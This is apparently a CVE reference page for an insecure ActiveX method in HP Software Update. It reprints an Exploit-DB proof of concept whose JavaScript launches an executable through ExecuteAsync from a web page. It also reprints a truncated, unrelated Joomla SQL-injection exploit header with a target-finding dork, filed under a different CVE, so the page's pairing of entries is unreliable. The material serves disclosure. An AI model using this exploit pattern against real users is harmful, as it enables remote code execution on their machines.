CVE-2008-2390
Published 2008-05-21
Priority: P3 · 43 · medium
CVSS 2.0: 6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
EXPLOIT
EPSS: 6.86% (93.2th percentile)
Hpufunction.dll 4.0.0.1 in HP Software Update exposes the unsafe (1) ExecuteAsync and (2) Execute methods, which allows remote attackers to execute arbitrary code via an absolute pathname in the first argument.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | software_update | — | — |
No detection rules found.
Exploit-DB
Joomla! Component com_bookflip - 'book_id' SQL Injection
exploitdb·2009-06-29
CVE-2009-2390 Joomla! Component com_bookflip - 'book_id' SQL Injection
---
```perl
#!/usr/bin/perl -w
#Joomla com_bookflip(book_id) Sql injection#
########################################
#[~] Author : boom3rang
#[~] Greetz : H!tm@N - KHG - cHs - LiTTLE-HaCkEr - SpywarrioR - cRu3l.b0y - Lanti-Net - urtan
#---------------------------------------
#[!] BookFlip
#[!] June 2008
#[!] FCI F-Cimag-In
#[!] This component is distributed free of charge.
#[!] [email protected]
#[!] www.f-cimag-in.com
#[!] 2.1
#---------------------------------------
#[!] Google_Dork: inurl:"com_bookflip"
########################################
system("color FF0000");
print "\t ###############################################################\n\n";
print "\t # Kosova Hackers Group (KHG-CREW) #\n\n";
print "\t ########################
```
Exploit-DB
HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method
exploitdb·2008-04-27
CVE-2008-2390 HP Software Update - 'Hpufunction.dll 4.0.0.1' Insecure Method
---
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Insecure Methods in HP Update Software.
Remote: Yes
Executing code remotely is possible using the methods ExecuteAsync and Execute :-)
If a user visits the malicious page the attacker can execute code.
Coded by callAX
&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
Proof of Concept
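```javascript
function Do_it()
{
    // "boom" is the Hpufunction.dll control object; its declaration is not included in this excerpt.
    var Please = "c:\\windows\\system32\\calc.exe"; // first argument: absolute pathname
    var Give = "doest_matter";
    var Me = "c:\\";
    var Freedom = 1;
    boom.ExecuteAsync(Please, Give, Me, Freedom);
}
```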
# milw0rm.com [2008-04-27]
No writeups or analysis indexed.
2008-05-21
Published